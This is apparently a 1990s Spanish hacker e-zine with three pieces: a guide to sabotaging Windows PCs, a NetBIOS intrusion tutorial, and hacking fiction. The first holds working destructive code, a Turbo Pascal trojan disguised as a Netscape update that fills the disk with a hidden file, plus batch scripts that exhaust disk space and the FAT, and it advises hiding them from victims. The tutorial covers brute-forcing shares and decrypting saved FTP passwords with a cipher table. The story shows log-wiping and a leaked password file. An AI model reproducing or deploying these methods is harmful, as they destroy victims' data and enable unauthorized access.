********
Nota: El Sytem Tray es el lado derecho de la barra de tareas, donde se
encuentra el reloj y el control de volumen.
********
Te recomiendo que corras un generador de diccionarios en un directorio
que sea muy oculto, de ese modo se quedaren sin espacio y no sabren que fue
lo que causo eso. Te recomiendo uno de los subdirectorios de
C:\WINDOWS\System.
Otra forma de llenar el disco (esta es mucho mes repida), es con el
siguiente programa de Turbo Pascal:
PROGRAM beep;
USES crt,dos;
CONST
Hidden = $02;
VAR
code:integer;
print:text;
Attr:word ;
F:file;
BEGIN
code :=263;
SetTime(0,1,0,0);
SetDate(1999,2,10);
clrscr;
writeln(' Copyright 1994-1996 Netscape Communications Corporation');
writeln(' All rights reserved.');
writeln;
writeln(' Netscape Communications, Netscape, Netscape Navigator and');
writeln(' the Netscape Communications logo are trademarks of Netscape');
writeln(' Communications Corporation.');
readln;
writeln;
writeln('Thank you for downloading the Netscape Navigator 3 update, NN3.01');
writeln('We have made everycare that this program is to your satisfaction.');
writeln;
writeln(' NN3.01 is confirming where your copy of Netscape Navigator is');
writeln(' this make take some time.');
ASSIGN (PRINT,'c:\dos.sys');
writeln(Attr);
REWRITE (PRINT);
repeat
write(Print,'*':500,chr(code));
until KeyPressed;
Close(PRINT);
ASSIGN (F,'c:\dos.sys');
SetFAttr(F, Hidden);
writeln;
writeln(' This copy of NN3.01 contains BUGZ, please download another copy.');
readln;
Randomize;
repeat
TextAttr := Random(256);
Write('DO SIN');
until code = 264;
END.
Ese programa es un Trojan llamado Hard Disk Kill, y la verdad no entiendo
porque esas cosas inutiles en el codigo. ADVERTENCIA: NO lo corras en tu
computadora, este programa REALMENTE se acaba todo el espacio del disco en
pocos segundos. Sobre aviso no hay enga¤o.
La opcion de hacer que un archivo se copie y crezca (casi) infinitamente
se puede hacer fecilmente con un archivo batch:
: Para que un archivo crezca infinitamente:
echo qwertyqwertyqwertyqwertyqwertyqwertyqwertyqwertyqwerty > file1.sys
echo qwertyqwertyqwertyqwertyqwertyqwertyqwertyqwertyqwerty > file2.sys
echo qwertyqwertyqwertyqwertyqwertyqwertyqwertyqwertyqwerty > file3.sys
echo qwertyqwertyqwertyqwertyqwertyqwertyqwertyqwertyqwerty > file4.sys
echo a > total.dll
copy file1.sys + file2.sys + file3.sys + file4.sys + total.dll total2.dll
del file?.sys
del total.dll
ren total2.dll total.dll
copy total.dll total2.dll
:start
copy total.dll + total2.dll total3.dll
del total2.dll
del total.dll
copy total3.dll total2.dll
copy total3.dll total.dll
goto start
: Para que un archivo se duplique infinitamente:
echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > system.sys
:start
MD System
copy system.sys \System
CD System
goto start
El archivo batch pasado va a comerse a la FAT, ya que tambien crea
subdirectorios infinitos. Estos archivos los puedes compilar con alguno de
los programas que hay en circulacion, asi sere menos evidente.
Tambien se debe de tener en cuenta que renombrar un directorio puede
causar caos en el disco duro. El simple hecho de renombrar el directorio de
windows es suficiente para que un usuario inexperto crea que su computadora
este desompuesta y formatee su disco duro. (Parece estupido pero es cierto).
Con esto supongo que has agarrado unas cuantas ideas. Pasemos a otro
tema.
+---------------------+
| Pantallas de inicio |
+---------------------+
Windows 95 o superior comienza con un comercial: La pantalla de inicio.
Esta pantalla es completamente inutil y uno querria ponerle algo mes
productivo. Sorprendentemente(?), Micro$oft nunca dio un manera de cambiar
ese dibujo. Pero se ha hablado mucho en revistas y en "Guide to (mostly)
harmless hacking" sobre como modificar esa pantalla. Esto es muy conveniente
pues la mayoria de la gente no sabe eso, y uno puede modificar esas pantallas
a su gusto.
Los archivos que debes editar son Logo.sys, Logow.sys, Logos.sys. La
localizacion de estos archivos varia, asi que buscalos. Pueden tener
atributos de solo lectura, ocultos y/o sistema. Para editarlos solamente
ebrelos en Paint (estos archivos son archivos BMP con extension SYS). Pero
ten cuidado de no modificar su tama¤o (320 X 400) ni el numero de sus colores
(256). Ten cuidado, ya que estos archivos se miran aplastados cuando los
abres en Paint, calculale para que se vea bien al inicio y al final.
Por alguna extra¤a razon, no pude hallar el archivo logo.sys en Windows 98
Beta 3.
__________________________________________________
Esto es todo por el momento pero espero seguir escribiendo sobre este tema
(la verdad es que me encanta). Hasta la proxima.
Escrito por BadBit (Ex-miembro de El Radiaktivo Newz Team) badbit@yahoo.com
0101001001010100100101
-Como se sabe si Bill Gates este mintiendo? 10 0 1 01
Se le mueven los labios. 11 B@dbit 00
01 1 10
10 0 .... 10
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
°°°°°°°°°°°°±±±±±±±±±±±±²²²²²²²²²²²²²°°°°°°°°°°°°°±±±±±±±±±±±±²²²²²²²²²²²²²
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ[RM #6]Í
+ÄÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ+
³ Vulnerabilidades en Windows - NetBIOS ³
+ÄÄÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄÄÄÄÄ+
Introducci¢n
Muchos se preguntar n por qu‚, he escrito este texto si es muy dificil
conseguir hosts con recursos compartidos, este art¡culo no est hecho para que
trates de entrar a los PCs de otras personas que est‚n usando windows95/98
(aunque se puede dar el caso, y la mejor t‚cnica para esto ser¡a usar troyanos,
y ya se ha hablado bastante sobre ese tema) simplemente pq ning£n usuario
normal de inet anda por ahi compartiendo su disco duro as¡ no mas, el mejor
lugar para usar esta informaci¢n es en alguna intranet en la cual el servidor
est‚ corriendo bajo Windows NT ya que necesariamente si es un servidor debe
tener compartidos algunos recursos, el problema llega cuando comparte m s de
lo que deber¡a, Windows NT est tomando posesi¢n del mercado y algo que no
es un secreto es que a muchas personas que conectan un host a inet parece
que no les importara la seguridad en su sistema, si te pones a investigar y a
buscar un poco m s all de tus narices te llevar s la grata (grata para
nosotros) sorpresa de que existen sistemas que no poseen seguridad o una
seguridad casi nula, el que Windows NT est‚ tomando mucho terreno en inet
es raz¢n suficiente para que nosotros no nos concentremos solamente en UNIX y
tambien veamos que problemas hay en NT y porsupuesto como explotarlos.
Si aun piensas que los verdaderos host importantes en inet est n corriendo
bajo alg£n sabor de UNIX, te doy la razon pero tambien te digo que en la
mayor¡a de los casos solo los hosts realmente importante corren bajo alg£n
tipo de UNIX y los otros est n bajo NT debido a lo facil de manejar de este SO,
que te quiero decir con esto?? pues te respondo con una pregunta, que tal si
entramos a un sistema NT (o win95/98) el cual tenga archivos compartidos y
este use alg£n tipo de programa cliente para ftp del sistema principal,
muchas veces las p ginas web alojadas en esos sistemas son administradas
con estos programas, bueno si corremos con suerte y este sistema tiene
instalado el WS_FTP o el cuteftp y tenemos acceso a estos archivos estamos
hechos, ya que si tienen la opci¢n de guardar contrase¤a podremos obtenerla
facilmente, por si no qued¢ claro paso a explicar eso ahora.
El programa WS_FTP guarda los datos del host (nombre del host login y
password) en un archivo que tiene el nombre que le hayan dado al momento
de crear ese archivo pero .ini por ejemplo prueba.ini ahi est n los datos
incluyendo el password pero encriptado, la forma que vamos a usar para saber
cual es el password es instalando el ws_ftp en nuestro pc y agregando ese
archivo prueba.ini al directorio donde est grabado el ws_ftp y listo, al
elegir ese host veremos el password pero con los asteriscos, para ver lo que
est en asteriscos hay varios programas que te sirvan pero yo uso unhide.exe
lo puedes encontrar en mi p gina, tambi‚n hay un programa para crackear el
password, buscalo.
En caso de que el programa sea cute ftp es tan o m s facil descubrir el pass
solo bajate el archivo HOSTS.DAT si es la versi¢n es 1.x, el TREE.DAT para
V. 2.x y SMDATA.DAT para V. 2.5/2.6, el modo de cifrado es monoalfab‚tico,
osea solo sustituyen una letra por un caracter ascii, aqui est el modo de
cifrado para la £ltima versi¢n, no lo he probado para las anteriores
pero si alguien las usa y lo hace que me env¡e un mail.
¸=a ©=f œ=k õ=o ¬=t ñ=y =4 ¤=9
¦=b î=g Ï=l ÷=p «=u ý=z ì=5 ›=0
®=c =h ¾=m û=q ó=v —=1 ç=6
ª=d ¨=i Ý=n §=r =w £=2 ˜=7
ð=e ½=j 9=¤ ¯=s ¦=x –=3 Ð=8
Nota el valor de "h" no es que se me olvid¢, es alt+255, osea espacio en blanco.
+ÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄ+
³ NetBIOS ³
+ÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄ+
La forma que utilizaremos para entrar desde un sistema Windows a otro sistema
Windows es mediante NetBIOS (Network Basic Input Output System), El NetBIOS
fu‚ ideado por IBM y se ha extendido tanto que en la actualidad es un estandar.
Lo primero es configurar tu PC como cliente.
Ve a Panel de Control/Red
y en la parte de configuraci¢n te debe salir algo como esto
debes darle agregar, luego cliente, despues buscas Microsoft y escojes Cliente
para redes Microsoft
En la misma pesta¤a de Configuraci¢n, donde dice Inicio de Sesion principal
ponle o d‚jale Cliente para redes Microsoft, se recomiendo agregar
el protocolo NetBEUI, aqui hacen lo mismo solo que en vez de escojer Cliente
le das a protocolo y ahi escojes el protocolo NetBEUI, y creo que eso es todo,
si tienes alg£n problema me avisas.
Bueno ya al configurar tu PC bien ya el trabajo est hecho, ahora solo te falta
la v¡ctima, puede ser dificil de conseguir pero existe un programa que nos ayudar
en esta fase
+ÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄ+
³ Legi¢n v2.1 ³
+ÄÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄ+
Esta exelente utilidad escanea todos hosts que tengan el puerto 139 (nbsession)
abierto, y te dice que archivos o directorios que tiene compartidos, si los
tiene, te da dos opciones al momento de buscar hosts, la primera es Scan Range,
esta opci¢n escanea por rangos de IPs, osea busca todas la IPs comprendidas
entre dos direcciones, por ejemplo desde 127.0.0.0 hasta 127.0.0.255, y Scan
List revisa todos los hosts que tu incluyas en un archivo .txt, si has usado
programas como el BO (en sweep mode) o DeepBO (cuidado al usarlo ya que es
un troyano) no te ser dificil comprender esto ya que hace lo mismo
pero en vez del puerto 31337 lo hace al puerto 139, algunos de los hosts de
alguna intranet seguro que tendr n recursos compartidos ya que son servidores
de PCs en la mayor¡a de los casos.
-/-/-/-/-/-/-/-/-/-/-/-/-/-/ N O T A -/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
Lo que viene ha sido explicado una y otra vez en diferentes textos que
circulan por la red as¡ que es posible que ya lo hayas leido, pero no
ponerlo en este art¡culo ser¡a dar la informaci¢n a medias porque quizas no
todos lo hayan leido antes, as¡ que ahi les va...
-/-/-/-/-/-/-/-/-/-/-/-/-/-/ N O T A -/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
Si ya conseguistes una victima utiliza este comando
c:\>nbtstat -A IP_del_host
¢
c:\>nbtstat -a www.nombredelhost.com
y si todo sale bien, te saldr algo como esto
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERV <00> UNIQUE Registered
GRUPO-SERV <00> GROUP Registered
SERV <03> UNIQUE Registered
SERV <20> UNIQUE Registered
GRUPO-SERV <1E> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERV........<00> UNIQUE Registered
SERV <01> UNIQUE Registered
MAC Address = 00-40-02-35-F6-8E
ahora solo debes editar el archivo lmhosts as¡
IP_de_la_victima nombre_netbios
donde nombre_netbios es el primer tipo <00> UNIQUE es el nombre del host, en
este caso se llama serv, y por £ltimo solo vas a en la barra de inicio, buscar
PC y pones el nombre (aqui el nombre es serv) y listo, para saber si el host
est compartiendo recursos fijate en si tiene <20> UNIQUE como en este caso.
Muchas veces te conseguiras con que los hosts tienen passwords, pero Legion
tiene una excelente opci¢n para solucionar este problema, puedes
probar listas de palabras online y no offline como normalmente estamos
acostumbrados a hacer con los sistemas UNIX, tu solo le debes poner la lista
de palabras y el las ir probando una a una hasta conseguir la verdadera,
solo existe un peque¤o problema, Windows NT acepta hasta 14 caracateres para
sus passwords, lo que significa que un password bien escogido ser¡a casi
imposible que puedas descubrirlo, o por lo menos te tardar¡a unos cuantos
cientos de a¤os tratando y creo que nosotros no vamos a vivir tanto :-/ pero
ponte a pensar, si el admin es tan lamer como para tener sus recursos
compartidos lo m s seguro es que de password tenga su fecha de nacimiento o
algo parecido, y como lo m s seguro es que no sepamos nada del admin del
sistema pues entonces tenemos que recurrir al viejo sistema de crear listas de
palabras y n£meros nosotros mismos, hay programas que crean listas de palabras
y hay otros con los que tienes muchas opciones para alterar las listas como TPU,
que hab¡amos olvidado pq el john the ripper cada vez est m s r pido y y tiene
bastantes opciones, estos generadores de palabras nos ayudan a cazar un password
a la fuerza bruta (en este caso) aunque estemos usando una lista de palabras,
por ejemplo creamos una lista con palabras desde aaaaa hasta zzzzz, tambi‚n
debemos probar con n£meros ya que es muy probable que el password sea un
n£mero, si el password es una mezcla de n£meros y letras ya ahi la cosa se nos
complica pero no est de m s intentarlo. cualquier duda/sugerencia/correcci¢n
o loquesea me la puedes enviar a d4rkde4ath@usa.net y tal vez puedas
encontrarme en IRC en el servidor dalnet en #Hackers-Venezuela,
nos vemos por ahi.
^^DarKdEaTH^^
http://www.venkiller.org/cuevadark
http://members.xoom.com/hven
#Hackers-Venezuela en Dalnet
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
°°°°°°°°°°°°±±±±±±±±±±±±²²²²²²²²²²²²²°°°°°°°°°°°°°±±±±±±±±±±±±²²²²²²²²²²²²²
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ[RM #6]Í
ZAIBATSU
Megaflop (sniffer@usa.net) (c) 1998-1999
Todos los nombres y lugares son ficticios, cualquier semejanza con la
realidad es pura coincidencia.
Cd. de Mexico
6pm - Smart coffee
En algun lugar de la metropoli
Su impaciencia y nerviosismo aumentaban conforme transcurria el tiempo,
faltaban unos cuantos minutos para la cita que Batt y Sysko, un cracker
y un phreak de la cd. de Mexico habian concertado con un sujeto al que
solo habian escuchado por telefono y cuyo nick era Cox3. El lugar destinado
para la entrega era un cybercafe frecuentado por adolescentes tecnofilos,
en una zona centrica y conflictiva de la ciudad, de facil acceso y con una
conexion a la red de 28.8 kbps sirviendo a 40 maquinas, lo cual lo hacia de
costo en exceso barato.
Batt miraba el display de su reloj, digital, lo cual no le permitia ver el
girar de las manecillas, miraba a su alrededor desconfiando de todos y al
mismo tiempo analizandolos; en una mesa al fondo del local una pareja
navegaba la red, en otra mesa una chica miraba insistentemente a Sysko,
este se preguntaba si no seria ella su contacto.
Eran las 6 en punto, esperaban la aparicion de Cox3, cuando se acerco un
chico a su mesa, Sysko inmediatamente pregunto: -"Eres Cox3?"-, a lo que
respondio, -"No, soy Carlos, administro esta red, es que ustedes llegaron
desde hace 30 mins. y no han solicitado ningun servicio, su cuenta va a
empezar a correr o desalojan la mesa"-. Asi que por fin encendieron el
equipo, tratando de hacer tiempo, Batt realizo un telnet a una VAX
localizada en Francia, solo para checar un proceso que tenia corriendo,
mientras esperaban la llegada de Cox3. De repente sono el beeper de Batt,
tenia un mensaje nuevo: "Voltea hacia atras de ti, en la segunda mesa,
soy Cox3".
Apagaron el equipo y se acercaron a la mesa de Cox3, -"Hola, soy Batt,
yo te contacte en el canal de hacking, y el es Sysko, un phreak"-,
Cox3 replico -"no tengo mucho tiempo y la informacion que te voy a dar
es confidencial, utilizala, cuando conozcas bien el sistema, distribuyela,
ahora tengo que irme, y no me busques de nuevo porque no me encontraras"-.
Les entrego un diskette de 3 1/2 pulgadas, la etiqueta rota parecia de un
disco de distribucion de "AOL", ahora reciclado, y sin la proteccion
metalica. No podian esperar para ver el contenido del disco, asi que tomaron
el tren subterraneo para trasladarse a la casa de Sysko, el medio mas rapido.
Cd. de Mexico
7:30pm - Casa de Sysko
La habitacion de Sysko es un peque¤o cuarto, con una se¤al de "radioactivo"
en la puerta, y un poste anaranjado en la entrada que se lee "No golpear o
excavar, cableado de fibra optica", y el nombre de la compa¤ia telefonica,
la roseta del telefono tiene una apariencia extra¤a, parece un walkman, del
cual salen dos conexiones, tiene tambien dos switches, que tienen la funcion
de amplificar y de mantener arriba el voltaje en caso de una llamada entrante.
Y en su escritorio, al lado de su pc, una laptop, un telefono inalambrico
que parece haber sido quemado, y 2 manuales de administracion de software
de un PBX NORT.. .Sysko encendio su PC, su clon de Pentium ahora parecia
una 8088, dada su impaciencia por ver la informacion que le habia sido
proporcionada, introdujo por fin el disco e intento ver el directorio...
A:\>dir
El volumen de la unidad A es LOONEYD34
El numero de serie del volumen es 14F1-3330
Directorio de A:\
COMMAND COM 96,276 16/03/96 9:18p COMMAND.COM
1 archivo(s) 96,276 bytes
0 directorio(s) 1,352,172 bytes libres
"Solo esta el command.com", - Sysko
"Debe de estar en el command.com, abrelo con un editor hexadecimal:
-----BEGIN PGP MESSAGE-----
Version: PGPfreeware 5.0i for non-commercial use
MessageID: SYtg1UmX+M1rWB/L63LGAPP+SvrH+sTf
qANQR1DBwk4D8klj1XQ/7d0QC/44Ioh6ovfvEQ5/pvV3wgCRZXJdr9CZGjH2Ske/
l1ZB2FaOERD2oRUyVwvYlIGQ/GZ78An0uErq54Omtq27c8bCVriwdh+8DwG9UR05
wvFjh0QBGc4oXobykIQ03LVP9NBwMkWF27QVLb57oMV5cHHaCXdwBo8nRDmYjEPR
NZFxCAMESGvDJyVvP7NQOcctQ8tgjElayvwBfTG8eHqUvUjAxQbm5qpecL3Eibdu
KdO2QV9niRCr16Bxr+vZCMxqB5Iacsl66A3eU5o7VFDIDaiq+iSiA/WSDLltEiCK
DvIXyZaIaG3cCaiJgX2YHcc3CWQ72/Wo7zqU0UrMILiCAel0bKHNlEwBFZjivaYp
54KH1kHHzM7wAV7GrC/pxAZtLsFOPZwd3CHto2cL8BiwQ8u1io7JwNUxak+vZ/5o
1OY7mGGLkKMSBeOHiNu47dE9GLPNeXIgeqtCZsPXqokAaNft+IoLiUxQl/9QzElg
KHJJrZ6CxkeNssfbzVZ/n33YR+oL/1XYyY6njtU0tLH2QRiSjANROqtk7OmG9FbF
X6bU2h1nzB+Zd4nCAUgb3NteCV0Jype4gtJsNDiJWJo+HbntlIA09f2X/eefO3jN
AZUnh9DmcCbNq0i2faJfiBG5FQzQ3Xt8I4K1vEuJHezk8dxy7T3u6CmHiK7nfZZJ
S8hJqYOMdxuQ+Ow7lhuNWSSSOu62OqbeqGCEwC/2/Mv6b0tss8S5H94a0FbjmENJ
XJY66gYI6YRv/LjavhphasH2Hn36SHgS1cAPSK9gh8EAlY7pH9h4GU5FyLGlg7Ia
jJ5FkNLkMo8N/u6h5lsOeZe/Mi12YbLe2FEvkKRwNuvlBwmwd3G47brbLGyg/rD7
aeh1eCwYYNiQgu7IyvYX+si4UNB07KSaKkW8uf4DKpM6ajnARQTv54Ugabnuq5zb
028NSWqvOcyvDSplwxvmLtAJ7ciGUiPASSI8va3FiXyrO9hiy1aPeZOyCVunwru6
apx5bayjtx2l4ZSiP5cGoSci3G6X+smXV70C1uHwRxTTIeorgn09v6wgqLeyzRMo
2Vh7BFyaIA+vQ3T/j2r5t0kaCT+/00eL/8XiaHTZeCRIYVe70sUyJblRceZWUMdn
gtaHjwxsHfavQtjILsyK9EsJFdlKWeDjTfwfMFzhglaRQQdhWr2l03oO3dPCEAF9
ctooiMzIh3nQ91twk/XfrnDsm+w7rMYvtRqjJztscA==
=H2qo
-----END PGP MESSAGE-----
-"Esta encriptado, necesitamos la llave y la password" - Batt
-"La llave esta anexada al final del command.com, pero necesitamos
la password aun, intentamos un ataque de fuerza bruta?"- Sysko, y
sonrie sarcasticamente...
-"Si claro... ; probemos con su nick, o el tuyo"- Batt
.
.
-"Nop, no resulto, con la etiqueta del disco: LOONEYD34" - Sysko
.
.
-"O con el numero de serie..." - Batt
.
.
-"NADA!, solo falta que esto no tenga nada!" - Sysko
.
.
-"Y que tal: 1352172, es el numero de bytes libres..." - Batt
.
.
**************
TELCO
root:carlos99:0:0::/:/bin/ksh
asanch:defensa:14:217:Alejandro Sanchez:/home/asanch:/bin/ksh
csilva:pimpollo:116:202:Cesar Silva:/home/csilva:/bin/ksh
rortega:abril:128:217:Roberto Ortega:/home/bortega:/bin/ksh
cfern:secreto:294:158:Carla Fernandez:/home/cfern:/bin/ksh
manten:netnam:364:163:Mantenimiento:/home/manten:/bin/ksh
telefono:utopia:491:202:acceso telefonico:/home/telefono:/bin/ksh
Have fun-************
Todo se mantiene apacible.
-"Creo que ya sabes de donde es ese passwd"- Batt
--ZAIBATSU--
Cd. de Mexico
1:30am - Casa de Sysko
Es el momento de entrar al sistema, no ha sido facil esperar la madrugada,
lo atractivo de un servidor de una telefonica es dificil de explicar,
siquiera imaginar, a menos que sepas cual es la recompensa.
Van a intentar el acceso a un servidor importante en la misma ciudad,
seria una mala idea intentarlo desde su casa, Batt mira el display de su
reloj de nuevo..., y no hay manecillas! Sysko, extrae de su pantalon un
telefono celular, clonado desde luego, un Motorola, un tanto estorboso,
pero con los codigos correctos de reprogramacion es suficiente.
-"Conectala aqui..."- Sysko, mientras acerca un delgado cable que abrira
la conexion telefonica. La conexion PPP no es suya, la "tradearon" con un
cracker, a cambio de unos warez, ademas necesitan triangular la conexion,
pasar por algunos servidores alrededor del mundo, claro, necesitan root en
algunos de ellos, para eliminar bitacoras, haciendo casi imposible el
rastreo...
Entrar no supone problema alguno, tienen la password de root (carlos99),
al parecer agregar 2 digitos al final del nombre no es seguro.
Batt prepara los respectivos fuentes para borrar bitacoras, y ser invisibles,
y otros mas para desactivar "checksums" e instalar backdoors, no estan
seguros de que tanta informacion encontraran, quizas una noche no sea
suficiente para encontrar lo que estan buscando...
Cd. de Mexico
2am - Casa de Sysko
El display digital del reloj de Batt indica las 02:00, la urbe duerme, sin
embargo en la otra mitad del globo es de dia. InterNET no duerme.
Con todo listo para el acceso al servidor de Zaibatsu reinicializan la
maquina. Su clon de P3ntium luce un tanto extra¤o, el CPU no tiene cubierta,
y el disco duro esta fuera del gabinete soportado en un libro blanco de
grandes letras azules; la maquina arranca de nuevo, su kernel es 2.0.32.
Sysko realiza una llamada, determina que es mejor utilizar un ISP distinto
al de costumbre, no quiere arriesgar su conexion a un posible rastreo.
-Luis, soy Sysko, necesito una conexion limpia.
-Yo necesito dormir, sueles hablar con tus socios a las 3am?.
-2am... -replico Sysko.
-Que ?
-Son las 2 am. -dijo Sysko en forma sarcastica.--...
no quiero saber para que deseas la cuenta, pero puedo adivinarlo, -dijo Luis-
Porque no simplemente haces tu tarea como los chicos buenos?.
Sysko sonrie...
-Login: acceso y Password: grupo, no rompas muchos corazones, adios.
-Te debo una Luis, gracias. -Sysko cuelga el telefono.
Batt enciende su modem conectado al celular Mot0ro1a clonado, su ESN es
ED 6B 53 22, son las 2:05 y Sysko luce nervioso, pero para Batt es la
rutina de todos los dias. En otras circunstancias necesitaria de una buena
dosis de cafeina para mantenerse despierto, hoy ese trabajo lo hace la
adrenalina.
CONNECT 57600
Arranca su cliente de IRC, los servidores de su continente estan casi
vacios, asi que abre su conexion a Europa, alla estan despiertos algunos
de sus colegas.
-Que tienes Batt ? -D1abl0 en el canal del IRC.
-No puedo decirte, estamos solos Sysko y yo en esto, cuando tenga root
te mando un privado.
-Ok, nosotros estamos en un sitio de spam, quieres entrar, esta todo
limpio ya, este tipo no va a volver a hacer negocio con las listas de
e-mail, si vieras lo que tiene en root...mp3. -escribio D1ab10 en
letras rojas en el canal-.
-Lo imagino, de otro modo no serias root... -escribio Batt riendo.
-Batt, necesito un overflow para SC0 5.0, tengo uno para S0LAR1S 2.6, el
que me habias pedido, tiene unos minutos que lo libero ZYX -dijo Layer,
otro cracker del Team en el canal del IRC.
-Te lo envio por DCC, quiero el de solaris, y necesito que hagas un
portscanning a esta ip:..., me dijo ZYX que tenia root en JPL, que
queria controlar el Sojourner como a su TYCO"... -dijo Batt, al tiempo
que cerraba una ventana congelada.
Sysko interrumpe la conversacion, -el tiempo es dinero, no vamos a conseguir
root HOY si no te das prisa brother-.
Batt inicia su rutina, cierra todas sus aplicaciones, incluido su server
de mp3, y abre una sesion telnet a un server en Argentina con W1ngat3, es
solo un brinco que va a dar, tiene una ruta trazada, de rutina para sus
conexiones, pero ahora no es una conexion cualquiera, asi que hace un
cambio "on the fly", rutea su nueva conexion hacia Alemania, a otro
servidor, es una 0rigin, que originalmente habia utilizado unos meses
antes para intentar crackear RSA; tiene ahora 2 puentes y de Alemania va
a regresar su conexion a Mexico, sabe que va a tener un delay en la
comunicacion por los enlaces satelitales, asi que brincar a otro continente
seria esperar mucho en la comunicacion, por lo que solamente pasara antes
por otro server en Mexico, el cual segun el tracing que ha hecho hace una
conexion terrena por fibra optica a Zaibatsu, asi que este ultimo no
representa delay.
Preparan este ultimo server en Mexico para borrar bitacoras, pues sera su
conexion directa a Zaibatsu...
Connected to telco.mx.
Escape character is '^]'.
UN1X(r) Syst3m V Release 4.0 (telco)
login: rortega
password:
Last login: Sun Apr 5 11:20:19 from 157.130.67.198
2un Micr0syst3ms Inc. 2un0S 5.3 Generic September 1993
2:20 y estan dentro del servidor, la informacion que Cox3 les habia
proporcionado es verdadera, de cualquier modo eso no garantiza que no sea
una ratonera; en ese momento el otro telefono de Sysko suena y contesta
-Si, en eso estamos, somos Batt y yo, ok, no lo difundas...
-Quien era, tu mama? -pregunto Batt.
-No, era Layer, dice que sabe en que sistema estamos....
-Como se enteraron, acaso es una trampa? -inquirio Batt.
-No, la maquina de Argentina te la paso Layer, recuerdas, ni¤o
inteligente?, tiene un sniffer corriendo ahi y ya sabe a donde estamos
conectados.
-Cambiemos entonces la ruta...
-No tiene caso, mejor termina el trabajo, que aun no tienes root y de
cualquier modo Zaibatsu ya registro nuestras IPs.
-No acepta root remoto, y no encuentro el SU por ningun lado, voy a buscar
el shell que menciono Cox3... -dijo Batt.
-Busca cox3 en /bin...
-OK, ahora es un gatito -dijo Batt mientras tecleaba otros comandos-.
-Busca la base de datos y algo como trunks o carriers, date prisa, y
empieza a borrar bitacoras ya.
Batt no deja de mover sus pies, visiblemente nervioso ahora, y Sysko
camina por toda la habitacion, las manos de Batt tiemblan y Sysko enciende
un cigarrillo, de repente... bip bip bip, Batt brinca de su silla...
-Que ocurre, el celular? -dijo Batt sin dejar de mirar el monitor-.
Sysko se lleva la mano hasta su bolsillo y extrae un dispositivo de color
transparente con un display digital en el frente, luce como un llavero,
una mascota virtual, un... tamag0tchi..., Zaibatsu tiene su presencia en
cada rincon del orbe...
- No estas un poco grande pare eso?... -pregunto Batt molesto-. Pide a
Layer que entre a Zaibatsu a buscar, o no vamos a terminar hoy, y no
hay otro tour para ma¤ana.
Layer esta adentro ahora, con algunos procesos find corriendo la maquina
ahora se siente lenta, esperan los resultados de la busqueda, mientras han
estado revisando el sistema, passwords de otros sistemas. Layer le manda
por otra via un mensaje a Batt, revisando las bitacoras noto los logins de
root en dias anteriores... algunos de ellos entre las 2am y 4am...
-Creo que este chico si hace su tarea..., tenemos otro root fake que nos
gano el sistema o root entra en las madrugadas a revisar su sistema...
-dijo Layer.
-Diablos..., ya borre logs, no hay huellas, al menos en este sistema,
pero no estoy seguro de que NO se este monitoreando con otro equipo de
respaldo, pero si nos salimos ahora ya no podremos regresar, podria ser
una trampa... -dijo Batt mientras frotaba sus irritados ojos.
-Pregunta a Layer que ha encontrado, tenemos que salir rapido, aunque
confio en que ese root era cox3 -agrego Sysko.
-Ya encontre algo interesante, entra a /usr/admin/docs, son 500 MB, y por
lo que he abierto son cuentas de dial-ups, parece su base de datos
nacional, no se tu, pero yo voy a bajar esto..., -dijo Layer- tengo un
server en Estados Unidos, manda todo alla, es una T1.
El proceso find de Batt arroja buenos resultados...
-Sysko encontre algo con la palabra trunk inside, dime que es lo que
estabas buscando... -dijo Batt mientras frotaba sus ojos de nuevo, ya era
una rutina teclado-ojos.
Trunks.
Control Signal:
X 100ms +/- 20ms (0 short single signal!)
Y 100ms +/- 20ms (1 short single signal!)
XX 350ms +/- 70ms (0 long single signal!)
YY 350ms +/- 70ms (1 long single signal!)
Sysko se queda pensando un segundo viendo hacia el monitor, subitamente
teclea en su celular el numero de Layer... -Olvida lo demas, ve al
directorio /usr/1tuinfo/1998 y baja TODO, AHORA!.
Sysko es un extremista, sus amigos dicen que puede seducir a un CC1TT-7,
que importa, el sabe que es el mejor, Zaibatsu esta cerca de caer ante
sus encantos...
Batt vuelve a limpiar LOGs y advierte a Layer que va a abandonar el
sistema en cuanto confirme los downloads..., de pronto recibe un mensaje
en linea, en el sistema...
* From root: Quien eres?
# w
02:40 activo 1 dia, 16:29, 3 usuarios, carga media: 0,10, 0,08, 0,04
Usuario tty i. sesion@ desocupado JCPU PCPU que
rortega pts/0 02:20 0 0 0 w
rortega pts/1 02:30 0 1 1 -ksh
